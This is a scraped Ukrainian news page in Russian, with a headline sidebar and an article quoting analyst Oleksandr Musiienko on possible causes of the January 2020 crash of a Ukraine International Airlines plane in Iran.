самолет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789372"> <span class="postDate">15:04</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-konec-gazovoj-epopei-chto-kroetsya-za-dogovorom-po-tranzitu-anti-colorados">Конец газовой эпопеи: что кроется за договором по транзиту, - Anti-colorados</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789361"> <span class="postDate">14:48</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/901-na-odesshhine-deti-pozhalovalis-policejskim-na-izdevatelstva-so-storony-roditelej">На Одесщине дети пожаловались полицейским на издевательства со стороны родителей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789368"> <span class="postDate">14:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-shhenki-vpervye-uvidevshie-sneg-pokorili-set-svoej-neposredstvennostyu-foto">Щенки, впервые увидевшие снег, покорили Сеть своей непосредственностью (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789356"> <span class="postDate">14:20</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/901-stoimost-akcij-tesla-prevysila-obshhuyu-kapitalizaciyu-general-motors-i-ford-vmeste-vzyatyx">Стоимость акций Tesla превысила общую капитализацию General Motors и Ford вместе взятых</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789341"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-kak-tramp-sdelal-kitayu-neozhidannyj-podarok">Как Трамп сделал Китаю неожиданный подарок</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789370"> <span class="postDate">13:56</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-aviakatastrofa-v-irane-novye-versii-i-ix-sostoyatelnost-zloj-odessit">Авиакатастрофа в Иране: новые версии и их состоятельность, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789337"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-stalo-izvestno-chto-budet-s-paketom-malysha-v-ukraine-v-2020-godu">Стало известно, что будет с "пакетом малыша" в Украине в 2020 году</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789354"> <span class="postDate">13:30</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/901-uchenye-rasskazali-kak-ofisnomu-rabotniku-pobedit-stress">Ученые рассказали, как офисному работнику победить стресс</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789334"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/901-v-socseti-twitter-poyavitsya-novaya-interesnaya-funkciya-podrobnosti">В соцсети Twitter появится новая интересная функция: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789340"> <span class="postDate">13:16</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-krushenie-ukrainskogo-samoleta-redaktor-bild-nashel-dokazatelstva-raketnoj-ataki">Крушение украинского самолета: Редактор Bild нашел доказательства ракетной атаки</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789345"> <span class="postDate">13:08</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/901-dzhastin-biber-priznalsya-chto-zabolel-neizlechimym-nedugom">Джастин Бибер признался, что заболел неизлечимым недугом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789330"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-koshka-v-buddijskom-xrame-zaxotela-laski-pryamo-vo-vremya-molitvy-video">Кошка в буддийском храме захотела ласки прямо во время молитвы (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789323"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/901-v-set-utekli-izobrazheniya-novogo-sedana-7-series-ot-kompanii-bmw-foto">В Сеть утекли изображения нового седана 7-Series от компании BMW (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789325"> <span class="postDate">12:42</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-sinoptiki-prognoziruyut-ukraine-mokryj-sneg-i-dozhdi-na-blizhajshie-dni">Синоптики прогнозируют Украине мокрый снег и дожди на ближайшие дни</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789333"> <span class="postDate">12:37</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/901-kakix-reform-v-ekonomike-stoit-zhdat-v-2020-ukraincam">Каких реформ в экономике стоит ждать в 2020 украинцам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789320"> <span class="postDate">12:15</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-elizaveta-ii-otreagirovala-na-reshenie-princa-garri-i-megan-markl-pereexat-iz-britanii">Елизавета II отреагировала на решение принца Гарри и Меган Маркл переехать из Британии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789331"> <span class="postDate">12:12</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-chudom-izbezhal-tragedii-pilot-rasskazal-kak-ego-vnezapno-snyali-so-smertelnogo-iranskogo-rejsa-mau">Чудом избежал трагедии: Пилот рассказал, как его внезапно сняли со смертельного иранского рейса МАУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789329"> <span class="postDate">12:09</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-morskie-aviatory-otognali-ot-ukrainskogo-poberezhya-korabl-shpion-fsb">Морские авиаторы отогнали от украинского побережья корабль-шпион ФСБ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789328"> <span class="postDate">12:02</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-tureckij-potok-i-ego-bolshaya-lozhka-dyogtya-v-misochke-myoda-zloj-odessit">Турецкий поток и его большая ложка дёгтя в мисочке мёда, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789317"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-volontery-shyut-specialnye-varezhki-dlya-koal-kotorye-postradali-ot-pozharov-v-avstralii-foto">Волонтеры шьют специальные варежки для коал, которые пострадали от пожаров в Австралии (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789327"> <span class="postDate">11:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-chernye-yashhiki-povrezhdeny-piloty-pytalis-vernutsya-poyavilsya-doklad-irana-po-samoletu-mau">"Черные ящики" повреждены, пилоты пытались вернуться: Появился доклад Ирана по самолету МАУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789326"> <span class="postDate">11:45</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-v-snbo-sdelali-gromkoe-zayavlenie-po-krusheniyu-boeing-737">В СНБО сделали громкое заявление по крушению Boeing 737</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789314"> <span class="postDate">11:11</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/901-stalo-izvestno-na-skolko-podesheveli-teplo-i-voda-dlya-kievlyan">Стало известно, на сколько подешевели тепло и вода для киевлян</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789312"> <span class="postDate">11:00</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/901-andrej-kobolev-poyasnil-masshtab-udara-po-putinskomu-gazoprovodu">Андрей Коболев пояснил масштаб удара по путинскому газопроводу</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789315"> <span class="postDate">10:39</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/901-v-ukraine-predlozhili-oblagat-ajtishnikov-nalogami-po-novomu">В Украине предложили облагать айтишников налогами по-новому</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789316"> <span class="postDate">09:55</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/901-katastrofa-mau-akcii-boeing-upali-posle-krusheniya-v-irane">Катастрофа МАУ: Акции Boeing упали после крушения в Иране</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789309"> <span class="postDate">09:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-ekspert-mezhdunarodnik-poyasnil-pochemu-tretya-mirovaya-vojna-otmenyaetsya">Эксперт-международник пояснил, почему Третья мировая война отменяется</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789313"> <span class="postDate">09:36</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-nam-nuzhna-pobeda-snajper-vsu-rastrogal-set-moshhnym-poslaniem-k-ukraincam">"Нам нужна победа": Снайпер ВСУ растрогал сеть мощным посланием к украинцам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789308"> <span class="postDate">09:21</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-vojna-na-donbasse-rossijskie-vojska-na-donbasse-podlo-udarili-po-vsu">Война на Донбассе: Российские войска подло ударили по ВСУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789311"> <span class="postDate">09:15</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-kanadskie-razvedchiki-sdelali-gromkoe-zayavlenie-o-krushenii-ukrainskogo-boinga">Канадские разведчики сделали громкое заявление о крушении украинского Боинга</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789310"> <span class="postDate">08:45</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-posadili-na-unitaz-i-unizili-v-sirii-volna-vozmushhenij-posle-vstrechi-putina-i-asada">Посадили на "унитаз" и унизили: В Сирии волна возмущений после встречи Путина и Асада</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789307"> <span class="postDate">08:20</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/901-v-ops-group-dopustili-chto-samolet-mau-byl-sbit">В OPS GROUP допустили, что самолет МАУ был сбит</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4789439"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_society">Новости общества</a> <span>&raquo;</span> Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства</div><time datetime="2020-01-09T20:19:46+02:00"><span id="date">Новости общества, 09.01.2020 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9C%D1%83%D1%81%D0%B8%D0%B5%D0%BD%D0%BA%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE%D1%81%D1%82%D0%B8+%D0%BA%D1%80%D1%83%D1%88%D0%B5%D0%BD%D0%B8%D1%8F+%D1%81%D0%B0%D0%BC%D0%BE%D0%BB%D0%B5%D1%82%D0%B0+%D0%9C%D0%90%D0%A3+%D0%B8%D0%B7-%D0%B7%D0%B0+%D0%B2%D0%BD%D0%B5%D1%88%D0%BD%D0%B5%D0%B3%D0%BE+%D0%B2%D0%BC%D0%B5%D1%88%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9C%D1%83%D1%81%D0%B8%D0%B5%D0%BD%D0%BA%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE%D1%81%D1%82%D0%B8+%D0%BA%D1%80%D1%83%D1%88%D0%B5%D0%BD%D0%B8%D1%8F+%D1%81%D0%B0%D0%BC%D0%BE%D0%BB%D0%B5%D1%82%D0%B0+%D0%9C%D0%90%D0%A3+%D0%B8%D0%B7-%D0%B7%D0%B0+%D0%B2%D0%BD%D0%B5%D1%88%D0%BD%D0%B5%D0%B3%D0%BE+%D0%B2%D0%BC%D0%B5%D1%88%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4789439" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>В США допускают, что Иран по ошибке сбил самолет МАУ</p></b> <div style="text-align:center;"><img width="460" height="372" src="https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1-460x372.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1.jpg 460w, https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1-112x91.jpg 112w, https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1-300x243.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div> <p>С вопросом относительно возможности крушения украинского самолета МАУ в результате внешнего вмешательства «Экономические Новости» обратились за эксклюзивным комментарием к руководителю Центра военно-правовых исследований Александру Мусиенко, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p><a class="tag" href="https://enovosty.com/tag/aleksandr-musienko" target="_blank">Александр Мусиенко</a> сообщает, что сейчас СНБО озвучены версии о том, что украинский самолет потерпел катастрофу в результате внешнего вмешательства.</p><p>&#171;Речь идет либо о ракете. Кстати, вероятно, не только о русской, но и о ракете производства других стран. Также речь идет о том, что это могло быть столкновение с беспилотным разведывательным или ударным летательным аппаратом. Это мог быть теракт. Не исключаются также версии о катастрофе по техническим причинам, но их меньше.</p><p>И мне кажется, что, учитывая совокупность факторов, а именно то, что в те дни в Иране, как мы знаем, была неспокойная военно-политическая обстановка и Иран осуществлял военные ракетные атаки на американскую военно-воздушную базу, расположенную в Ираке. И как они сообщали, атаки осуществлялись за нескольких часов до вылета украинской рейса. Кроме того, очевидно, Иран держал в состоянии постоянной боевой готовности свои системы противовоздушной обороны. </p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_politics/full/2810-poziciya-ukrainy-otnositelno-bojkota-zasedanij-pase-yavlyaetsya-pravilnoj-musienko" >Позиция Украины относительно бойкота заседаний ПАСЕ является правильной, - Мусиенко</a></p><p>И, конечно, вся эта совокупность факторов и то, что сразу представители иранских властей начали выдвигать едва ли не единственную версию о том, что украинский самолет потерпел крушение из-за проблем с двигателями, навеяло определенные сомнения.</p><p>И поэтому я думаю, что украинские эксперты, которые, в частности, работают и анализируют информацию в аналитическом центре при СНБО и в оперативном штабе, который был создан во исполнение поручения президента, сейчас изучают различные версии из имеющихся источников. И они выдвинули версии о том, что самолет мог потерпеть катастрофу и в результате попадания в него ракеты. И мне кажется, что эти версии должны быть очень тщательно изучены. Потому что пока на сегодняшний день они выглядят такими, что действительно могли иметь место&#187;, &#8212; сообщает Александр Мусиенко</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4789439"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4789439&amp;_wpnonce=fbd9a0a46a"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-01-09T20:19:46+02:00"/><meta itemprop="dateModified" content="2020-01-09T23:27:44+02:00"/><meta itemprop="genre" content="Новости общества"/><meta itemprop="description" content="В США допускают, что Иран по ошибке сбил самолет МАУ"/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1-460x372.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1-460x372.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="372"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/aviakatastrofa-v-tegerane" rel="tag">авиакатастрофа в Тегеране</a>, <a href="https://enovosty.com/tag/aleksandr-musienko" rel="tag">Александр Мусиенко</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 170</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9C%D1%83%D1%81%D0%B8%D0%B5%D0%BD%D0%BA%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE%D1%81%D1%82%D0%B8+%D0%BA%D1%80%D1%83%D1%88%D0%B5%D0%BD%D0%B8%D1%8F+%D1%81%D0%B0%D0%BC%D0%BE%D0%BB%D0%B5%D1%82%D0%B0+%D0%9C%D0%90%D0%A3+%D0%B8%D0%B7-%D0%B7%D0%B0+%D0%B2%D0%BD%D0%B5%D1%88%D0%BD%D0%B5%D0%B3%D0%BE+%D0%B2%D0%BC%D0%B5%D1%88%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9C%D1%83%D1%81%D0%B8%D0%B5%D0%BD%D0%BA%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE%D1%81%D1%82%D0%B8+%D0%BA%D1%80%D1%83%D1%88%D0%B5%D0%BD%D0%B8%D1%8F+%D1%81%D0%B0%D0%BC%D0%BE%D0%BB%D0%B5%D1%82%D0%B0+%D0%9C%D0%90%D0%A3+%D0%B8%D0%B7-%D0%B7%D0%B0+%D0%B2%D0%BD%D0%B5%D1%88%D0%BD%D0%B5%D0%B3%D0%BE+%D0%B2%D0%BC%D0%B5%D1%88%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4789439" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="d5b95468fa" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4789407"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/901-itogi-dnya-zakrytye-versii-krusheniya-samoleta-voennaya-moshh-v-chernom-more-i-cenovye-tormoza">Итоги дня: 